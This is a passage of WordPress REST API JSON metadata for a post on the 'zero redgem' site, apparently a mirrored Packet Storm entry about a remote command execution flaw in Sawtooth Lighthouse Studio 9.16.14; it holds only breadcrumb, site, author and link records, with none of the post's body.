redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-19T11:39:24+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=41670#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=41670"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=41670#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Sawtooth Lighthouse Studio 9.16.14 Remote Command Execution_PACKETSTORM:215864"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41670","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=41670"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41670\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=41670"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=41670"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=41670"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}